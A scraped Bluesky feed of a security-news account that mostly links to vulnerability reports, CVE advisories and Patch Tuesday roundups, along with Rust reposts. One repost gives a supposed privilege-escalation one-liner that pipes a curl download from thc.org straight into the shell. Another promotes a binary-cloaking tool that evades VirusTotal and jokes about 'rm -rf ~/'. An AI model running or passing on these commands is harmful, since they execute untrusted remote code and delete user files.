nop.f(x)
@nopfx.bsky.social
📤 25
📥 73
📝 63
0xDEADBEEF
Privilege Escalation vulnerability in Motors, a
#WordPress
theme with more than 22,000 sales. This
#vulnerability
makes it possible for an unauthenticated attacker to change the password of any user
loading . . .
https://www.wordfence.com/blog/2025/06/attackers-actively-exploiting-critical-vulnerability-in-motors-theme/
3 months ago
0
0
0
#cpu
#fuzz
loading . . .
https://lifeasageek.github.io/papers/jaewon-difuzzrtl.pdf
3 months ago
0
0
1
#Veeam
has released security updates today to fix several Veeam Backup & Replication (VBR) flaws, including a
#RCE
. Tracked as
#CVE-2025-23121
, this security flaw was reported by security researchers at
#watchTowr
and
#CodeWhite
, and it only impacts domain-joined installations.
loading . . .
KB4743: Vulnerabilities Resolved in Veeam Backup & Replication 12.3.2
Vulnerabilities Resolved in Veeam Backup & Replication 12.3.2
https://www.veeam.com/kb4743
4 months ago
0
0
0
reposted by
nop.f(x)
Ioannis Polyzos
4 months ago
Ubuntu 25.10's switch to sudo-rs, a Rust-based sudo, shows a profound commitment to enhancing memory safety and system security. This move reflects the growing trend of leveraging Rust.
thenewstack.io/ubuntu-25-10...
#Ubuntu
#Ubuntu2510
#sudoRS
#RustLang
#MemorySafety
#SecureByDesign
#Security
loading . . .
Ubuntu 25.10 Replaces sudo With a Rust-Based Equivalent
The new sudo-rs is meant to be a near drop-in replacement for sudo, but some of the less secure aspects of sudo will not be supported.
https://thenewstack.io/ubuntu-25-10-replaces-sudo-with-a-rust-based-equivalent
0
0
2
reposted by
nop.f(x)
dcvz
4 months ago
🎉 godot-bevy v0.7.0 is out! Release with bug fixes and improvements: ✨ Node Type Markers - Better and more efficient ECS queries ⚡ Fix Timing - Component available in Startup systems 🚀 Performance improvements We also now have a
#godotbevy
book! 📖
#godotengine
#bevyengine
#rustlang
#gamedev
loading . . .
Release v0.7.0 · dcvz/godot-bevy
What's Changed Update the README "Basic Usage" section & add simple Node2D movement example by @DragonAxe in #37 feat: add explicit configuration of transform sync mode by @dcvz in #44 feat(docs):...
https://github.com/dcvz/godot-bevy/releases/tag/v0.7.0
1
26
6
reposted by
nop.f(x)
WhiteSponge
4 months ago
Good video by Stefan Baumgartner on refactoring with Rust!
youtu.be/wuBkzT_3CDU?...
#rustlang
loading . . .
Refactoring in Rust - Stefan Baumgartner
YouTube video by RustNL
https://youtu.be/wuBkzT_3CDU?si=aOZKJicPiq2hKikw
0
5
2
reposted by
nop.f(x)
Rust Bytes
4 months ago
3. Steve Klabnik attempted to answer the question we have all been asking, “Is Rust faster than C?”
steveklabnik.com/writing/is-r...
loading . . .
Is Rust faster than C?
Blog post: Is Rust faster than C? by Steve Klabnik
https://steveklabnik.com/writing/is-rust-faster-than-c/
1
0
1
#Roundcube
≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization
#CVE-2025-49113
loading . . .
Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]
A deep technical breakdown of CVE-2025-49113, a critical Roundcube vulnerability involving PHP session serialization. Learn how the bug was discovered, exploited, and responsibly disclosed with full P...
https://fearsoff.org/research/roundcube
4 months ago
0
1
0
#cve-2025-4598
#cve-2025-5054
loading . . .
New Linux Vulnerabilities - Schneier on Security
They’re interesting: Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to obtain access to access sensitive information. Tools...
https://www.schneier.com/blog/archives/2025/06/new-linux-vulnerabilities.html
4 months ago
0
1
0
#Cisco
##vulnerability
affecting Cisco IOS XE Wireless Controller Software version 17.12.03 and earlier. The issue was described as an unauthenticated arbitrary file upload, caused by the presence of a hard-coded JSON Web Token (JWT).
loading . . .
Cisco IOS XE WLC File Upload Vuln CVE-2025-20188
Explore how a hard-coded JWT in Cisco IOS XE WLC enables unauthenticated file upload and potential RCE—and how to mitigate it.
https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis
4 months ago
0
0
0
#vBulletin
#rce
#NDay
loading . . .
Don't Call That "Protected" Method: Dissecting an N-Day vBulletin RCE | Karma(In)Security
This is the personal website of Egidio Romano, a very curious guy from Sicily, Italy. He's a computer security enthusiast, particularly addicted to webapp security.
https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
4 months ago
0
0
0
#o3
#cve-2025-37899
#smb
#zeroday
loading . . .
How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation
In this post I’ll show you how I found a zeroday vulnerability in the Linux kernel using OpenAI’s o3 model. I found the vulnerability with nothing more complicated than the o3 API ̵…
https://blog.exploits.club/r/97a3832b?m=7f72b036-d9fe-4c67-bc6c-e554b89dd0cc
4 months ago
0
0
0
reposted by
nop.f(x)
rain 🌦️
4 months ago
new
#rustlang
crate drop: iddqd! ID-based maps where keys are borrowed from values. Four maps are included: IdOrdMap, IdHashMap, a bijective (1:1) BiHashMap and a trijective (1:1:1) TriHashMap. At Oxide we've found this pattern to be very useful. iddqd is no-std compatible, too!
docs.rs/iddqd
15
165
38
reposted by
nop.f(x)
Catalin Cimpanu
4 months ago
A Chinese APT (UNC5221) is behind recent attacks exploiting an Ivanti zero-day (CVE-2025-4427) This is a known Chinese APT group that seems to be specialized in Ivanti and other Western enterprise products... they have a long list of past zero-days in their name
blog.eclecticiq.com/china-nexus-...
loading . . .
China-Nexus Threat Actor Actively Exploiting Ivanti Endpoint Manager Mobile (CVE-2025-4428) Vulnerability
On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier.
https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability
0
7
2
A new
#critical
#vulnerability
popped up concerning samlify, a widely adopted
#Node.js
library for implementing
#SAML
2.0 Single Sign-On.
loading . . .
https://www.endorlabs.com/learn/cve-2025-47949-reveals-flaw-in-samlify-that-opens-door-to-saml-single-sign-on-bypass>
4 months ago
0
0
0
#Motors
<= 5.6.67 - Unauthenticated Privilege Escalation Via Password Update/Account Takeover
#wordpress
#theme
loading . . .
Premium WordPress 'Motors' theme vulnerable to admin takeover attacks
A critical privilege escalation vulnerability has been discovered in the premium WordPress theme Motors, which allows unauthenticated attackers to hijack administrator accounts and take complete contr...
https://www.bleepingcomputer.com/news/security/premium-wordpress-motors-theme-vulnerable-to-admin-takeover-attacks/
4 months ago
0
0
0
Broadcom-owned
#VMware
on Tuesday rolled out urgent patches for two sets of flaws that expose its flagship infrastructure software to data leakage, command execution and denial-of-service attacks.
loading . . .
NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch
VMware patches flaws that expose users to data leakage, command execution and denial-of-service attacks. No temporary workarounds available.
https://www.securityweek.com/nato-flagged-vulnerability-tops-latest-vmware-security-patch-batch/
4 months ago
0
0
0
A missing authentication for critical function vulnerability [CWE-306] in
#FortiOS
,
#FortiProxy
, and
#FortiSwitchManager
#CVE-2025-22252
loading . . .
PSIRT | FortiGuard Labs
None
https://www.fortiguard.com/psirt/FG-IR-24-472
5 months ago
0
0
0
#Google
released updates to address 4 issues in its
#Chrome
web browser, including one for which it said there exists an exploit in the wild.
loading . . .
https://thehackernews.com/2025/05/new-chrome-vulnerability-enables-cross.html](https://thehackernews.com/2025/05/new-chrome-vulnerability-enables-cross.html
5 months ago
0
0
0
#Intel
,
#AMD
and
#Arm
each published Patch Tuesday security advisories to inform customers about vulnerabilities found recently in their products, including ones related to newly disclosed CPU attacks.
loading . . .
Chipmaker Patch Tuesday: Intel, AMD, Arm Respond to New CPU Attacks
Intel, AMD and Arm each published security advisories on Patch Tuesday, including for newly disclosed CPU attacks.
https://www.securityweek.com/chipmaker-patch-tuesday-intel-amd-arm-respond-to-new-cpu-attacks/
5 months ago
0
0
1
#Siemens
,
#SchneiderElectric
and
#PhoenixContact
have released
#ICS
security advisories on the May 2025 Patch Tuesday.
loading . . .
ICS Patch Tuesday: Vulnerabilities Addressed by Siemens, Schneider, Phoenix Contact
Industrial giants Siemens, Schneider Electric and Phoenix Contact have released ICS security advisories on the May 2025 Patch Tuesday.
https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-addressed-by-siemens-schneider-phoenix-contact
5 months ago
0
0
0
#Zoom
fixes multiple security bugs, including a
#high-risk
flaw. Users are urged to update to the latest version released on May 13, 2025. The updates affect both general app versions and Windows-specific builds. For anyone using Zoom, especially on Windows systems, these updates are worth attention
loading . . .
Zoom Fixes High-Risk Flaw in Latest Update
Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
https://hackread.com/zoom-fixes-high-risk-flaw-in-latest-update/
5 months ago
0
0
0
Fortinet released security updates to patch a critical
#RCE
exploited as a
#zero-day
targeting FortiVoice enterprise phone systems. Vulnerability tracked as
#CVE-2025-32756
. As the company explains, successful exploitation can allow rce via maliciously crafted HTTP requests.
loading . . .
PSIRT | FortiGuard Labs
None
https://fortiguard.fortinet.com/psirt/FG-IR-25-254
5 months ago
0
0
0
Today is
#Microsoft
May 2025 Patch Tuesday, which includes security updates for 72 flaws, including five actively exploited and two publicly disclosed
#zero-day
#vulnerabilities
www.tripwire.com/state-of-sec...
loading . . .
May 2025 Patch Tuesday Analysis
This Patch Tuesday Analysis addresses Microsoft’sMay 2025 Security Updates. FIRE is actively working on coverage for these vulnerabilities.
https://www.tripwire.com/state-of-security/may-2025-patch-tuesday-analysis
5 months ago
0
0
0
#SCADA
Schneider Electric Modicon Controllers - Successful exploitation of these vulnerabilities may risk execution of unsolicited command on the PLC, which could result in a loss of availability of the controller.
www.cisa.gov/news-events/...
loading . . .
Schneider Electric Modicon Controllers | CISA
https://www.cisa.gov/news-events/ics-advisories/icsa-25-114-01
5 months ago
0
0
0
reposted by
nop.f(x)
Nicholas Grossman
5 months ago
How many foreign intel agencies already have spyware on Hegseth’s wife or brother’s phone? Is that the device they used to access Signal? Have they been offered money? Or sex? What secrets could be used for extortion? These are much more relevant NatSec questions than how many pushups can you do.
14
376
81
reposted by
nop.f(x)
Тsфdiиg
5 months ago
Fun Fact: the C operator >>= is officially called the "Shrek Operator". Because it's "Shift Right Equal" a.k.a "Shreq". It was named this way because Dennis Ritchie was a huge fan of the Shrek series.
4
191
10
#CVE-2025-30208
#vite
A critical vulnerability allowing unauthorized access to sensitive information via the Vite development server.
5 months ago
0
0
0
#elixir
#erlang
#otp
paraxial.io/blog/erlang-...
loading . . .
What the Critical Erlang SSH Vulnerability Means for Elixir Developers
How to determine if you are vulnerable.
https://paraxial.io/blog/erlang-ssh
6 months ago
0
0
0
#rce
#erlang
A critical vulnerability in the Erlang/OTP SSH, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices.
www.bleepingcomputer.com/news/securit...
loading . . .
https://www.bleepingcomputer.com/news/security/critical-erlang-otp-ssh-pre-auth-rce-is-surprisingly-easy-to-exploit-patch-now/>
6 months ago
1
1
0
reposted by
nop.f(x)
Paul Frazee
6 months ago
If you often say "wow I relate to developers" then I have the perfect job for you Developer Relations role just listed! There's also a bunch of other recent additions on the jobs page
bsky.social/about/join
loading . . .
Jobs - Bluesky
View open positions at Bluesky PBC
https://bsky.social/about/join
77
1172
284
reposted by
nop.f(x)
Haskell programming language
6 months ago
#Haskell
Language Server 2.10.0.0 release announcement!
blog.haskell.org/hls-2-10-0-0/
#LSP
#FunctionalProgramming
loading . . .
Haskell Language Server 2.10.0.0 release | The Haskell Programming Language's blog
https://blog.haskell.org/hls-2-10-0-0/
1
26
8
😶
www.theregister.com/2025/04/16/h...
loading . . .
Homeland Security funding for CVE program expires
: Because vulnerability management has nothing to do with national security, right?
https://www.theregister.com/2025/04/16/homeland_security_funding_for_cve/?utm_source=dlvr.it&utm_medium=bluesky
6 months ago
0
0
1
reposted by
nop.f(x)
The Hacker's Choice (1995)
6 months ago
new FEATRUE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to
virustotal.com
or any other but the target host. Please don't set BC_LOCK="rm -rf ~/" 🙈
github.com/hackerschoic...
0
4
1
reposted by
nop.f(x)
John Hammond
6 months ago
I got a chance to try out @Burp_Suite Burp AI, and it's... honestly really cool 😅 Video showcase where we cruise through a web app scan, crawl and audit, and it rips through findings including an explicit UNION SQL injection vulnerability and more 🤩
youtu.be/v-McepNOrTQ
1
17
3
A critical Remote Code Execution (
#RCE
) vulnerability,
#CVE-2025-27520
with a CVSSv3 base score of 9.8, has been recently discovered in
#BentoM
6 months ago
1
0
0
This is what American cease-fire looks like 😡🤬
add a skeleton here at some point
6 months ago
0
0
0
reposted by
nop.f(x)
The Hacker's Choice (1995)
6 months ago
🍿THC member on camera. A first. 😅 30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️ thanks
@wwsul.bsky.social
www.youtube.com/watch?v=sQVL...
loading . . .
Episode 4: Eduart Steiner aka Skyper
YouTube video by Where Warlocks Stay Up Late
https://www.youtube.com/watch?v=sQVLniT9CDY
0
9
4
#Fortinet
has released a critical security flaw impacting FortiSwitch that could permit an attacker to make unauthorized password changes. An unverified password change in FortiSwitch GUI may allow unauthenticated attacker to modify admin passwords via a specially crafted request.
#CVE-2024-48887
6 months ago
0
0
0
reposted by
nop.f(x)
Orhun Parmaksız
6 months ago
Debugging in the terminal isn't difficult anymore 🔥 🛠️ heretek - A gdb TUI dashboard 🐛 Supports viewing registers, hexdump & more! 🚀 Works with remote targets w/o gdbserver 🦀 Written in Rust & built with
@ratatui.rs
⭐ GitHub:
github.com/wcampbell0x2...
#rustlang
#ratatui
#tui
#gdb
#debugging
loading . . .
6
52
3
reposted by
nop.f(x)
Rick
6 months ago
NOBEL PRIZE-WINNING ECONOMIST says:
75
2512
1132
reposted by
nop.f(x)
vx-underground (automated mirror)
6 months ago
Ransomware groups will be raising extortion demands 10% due to Tariffs
1
60
14
#cve
CVE-2025-30065: Max severity
#RCE
#Apache
#Parquet
, impacting all versions <=1.15.0, looks like problem with deserialisation of untrusted data.
#cvss
v4 score of 10.0. Fixed release of Apache 1.15.1
6 months ago
0
1
0
reposted by
nop.f(x)
Deth Veggie
6 months ago
Ohhh.... Oh no. My dude.
14
71
15
Damn🤯
add a skeleton here at some point
6 months ago
0
0
0
reposted by
nop.f(x)
shenetworks
6 months ago
So if you get notified of lateral movement inside your network.. you should definitely look into that.. expeditiously
6
49
4
😀
add a skeleton here at some point
6 months ago
0
0
0
reposted by
nop.f(x)
Tib3rius
6 months ago
New video! Getting Into Cybersecurity - An Interview with @tracketpacer.bsky.social! Tracket has a truly unique job in the industry as a Cybersecurity Payload Specialist for rockets. As you'll learn in this interview, security in space is a lot more complicated! Watch now:
youtu.be/5so5e_5sfKs
3
48
6
reposted by
nop.f(x)
The Hacker's Choice (1995)
6 months ago
CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL
thc.org/7350pipe)%E2...
0
7
1
reposted by
nop.f(x)
Nathaniel B 🦀
6 months ago
Holy shit this is HUGE for Rust adoption in critical systems! Thank you Ferrous Systems!
rustfoundation.org/media/ferrou...
loading . . .
Ferrous Systems Donates Ferrocene Language Specification to Rust Project - The Rust Foundation
Rust 1.0 was published in May 2015. As the language approaches its 10th anniversary, Rust has become one of the fastest growing and most-loved languages [1] among developers, thanks to a combination o...
https://rustfoundation.org/media/ferrous-systems-donates-ferrocene-language-specification-to-rust-project/
0
1
1
Load more
feeds!
log in